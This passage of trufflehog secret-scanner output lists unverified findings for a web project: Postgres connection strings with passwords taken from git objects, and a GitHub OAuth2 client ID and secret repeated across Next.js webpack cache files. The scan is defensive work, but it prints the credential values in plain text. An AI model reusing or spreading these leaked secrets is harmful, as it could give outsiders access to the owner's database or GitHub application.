host","VerificationFromCache":false,"Raw":"postgresql://postgres:change-me@postgres:5432","RawV2":"postgresql://postgres:change-me@postgres:5432","Redacted":"","ExtraData":{"sslmode":"\u003cunset\u003e"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/.git/objects/a6/51df8466618dadf92f1ce74d707093a9a8ec14","line":1}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":968,"DetectorName":"Postgres","DetectorDescription":"Postgres connection string containing credentials","DecoderName":"PLAIN","Verified":false,"VerificationError":"lookup postgres on 192.168.65.7:53: no such host","VerificationFromCache":true,"Raw":"postgresql://postgres:password@postgres:5432","RawV2":"postgresql://postgres:password@postgres:5432","Redacted":"","ExtraData":{"sslmode":"\u003cunset\u003e"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/.git/objects/b6/9ad022787c7085aa13ddf46162d90323ed4c06","line":1}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":968,"DetectorName":"Postgres","DetectorDescription":"Postgres connection string containing credentials","DecoderName":"PLAIN","Verified":false,"VerificationError":"lookup postgres on 192.168.65.7:53: no such host","VerificationFromCache":true,"Raw":"postgresql://postgres:password@postgres:5432","RawV2":"postgresql://postgres:password@postgres:5432","Redacted":"","ExtraData":{"sslmode":"\u003cunset\u003e"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/.git/objects/c7/6ab80e866f5818b684c4bff3295a71a6458924","line":7}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":968,"DetectorName":"Postgres","DetectorDescription":"Postgres connection string containing credentials","DecoderName":"PLAIN","Verified":false,"VerificationError":"lookup postgres on 192.168.65.7:53: no such host","VerificationFromCache":false,"Raw":"postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432","RawV2":"postgresql://postgres:24DY@1u5FLCkNMeiO@p@postgres:5432","Redacted":"","ExtraData":{"sslmode":"\u003cunset\u003e"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/.git/objects/d8/500e5572842426206b1cd73a67f217f76e3cbc","line":9}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":968,"DetectorName":"Postgres","DetectorDescription":"Postgres connection string containing credentials","DecoderName":"PLAIN","Verified":false,"VerificationError":"lookup postgres on 192.168.65.7:53: no such host","VerificationFromCache":true,"Raw":"postgresql://postgres:24DY\u00261u5FLCkNMeiO_p@postgres:5432","RawV2":"postgresql://postgres:24DY\u00261u5FLCkNMeiO_p@postgres:5432","Redacted":"","ExtraData":{"sslmode":"\u003cunset\u003e"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/.git/objects/e2/888862538e9d2a6978800e9beeaa7550cc4e6c","line":7}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":968,"DetectorName":"Postgres","DetectorDescription":"Postgres connection string containing credentials","DecoderName":"PLAIN","Verified":false,"VerificationError":"lookup postgres on 192.168.65.7:53: no such host","VerificationFromCache":true,"Raw":"postgresql://postgres:change-me@postgres:5432","RawV2":"postgresql://postgres:change-me@postgres:5432","Redacted":"","ExtraData":{"sslmode":"\u003cunset\u003e"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/.git/objects/f6/84cabb156bcf00bfeddb80f3fa58dcc2cd7d46","line":10}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":968,"DetectorName":"Postgres","DetectorDescription":"Postgres connection string containing credentials","DecoderName":"PLAIN","Verified":false,"VerificationError":"lookup postgres on 192.168.65.7:53: no such host","VerificationFromCache":true,"Raw":"postgresql://postgres:change-me@postgres:5432","RawV2":"postgresql://postgres:change-me@postgres:5432","Redacted":"","ExtraData":{"sslmode":"\u003cunset\u003e"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz","line":10674}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"BASE64","Verified":false,"VerificationFromCache":false,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz","line":10674}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"BASE64","Verified":false,"VerificationFromCache":false,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz","line":9893}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"BASE64","Verified":false,"VerificationFromCache":false,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/admin/.next/cache/webpack/server-development/6.pack.gz","line":9955}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":false,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/admin/.next/cache/webpack/server-development/6.pack.gz","line":4304}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"BASE64","Verified":false,"VerificationFromCache":false,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/admin/.next/cache/webpack/server-development/6.pack.gz","line":4304}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"BASE64","Verified":false,"VerificationFromCache":false,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz","line":7645}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"BASE64","Verified":false,"VerificationFromCache":false,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz","line":7645}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"BASE64","Verified":false,"VerificationFromCache":false,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz","line":7645}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"BASE64","Verified":false,"VerificationFromCache":false,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz","line":5811}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"BASE64","Verified":false,"VerificationFromCache":false,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz","line":5811}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"BASE64","Verified":false,"VerificationFromCache":false,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/admin/.next/cache/webpack/server-development/3.pack.gz","line":5811}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"BASE64","Verified":false,"VerificationFromCache":false,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-development/10.pack.gz","line":6254}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"BASE64","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-development/10.pack.gz","line":6254}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"BASE64","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-development/10.pack.gz","line":6254}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"BASE64","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-development/10.pack.gz","line":9525}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources.","DecoderName":"PLAIN","Verified":false,"VerificationFromCache":true,"Raw":"52813b1d8ad9af510d85","RawV2":"52813b1d8ad9af510d852da024c3b4f9947a48517639de7560457cd4ec6c","Redacted":"","ExtraData":{"rotation_guide":"https://howtorotate.com/docs/tutorials/github/"},"StructuredData":null} +{"SourceMetadata":{"Data":{"Filesystem":{"file":"/scan/apps/dashboard/.next/cache/webpack/server-production/0.pack","line":245909}}},"SourceID":1,"SourceType":15,"SourceName":"trufflehog - filesystem","DetectorType":924,"DetectorName":"GitHubOauth2","DetectorDescription":"GitHub OAuth2 credentials are used to 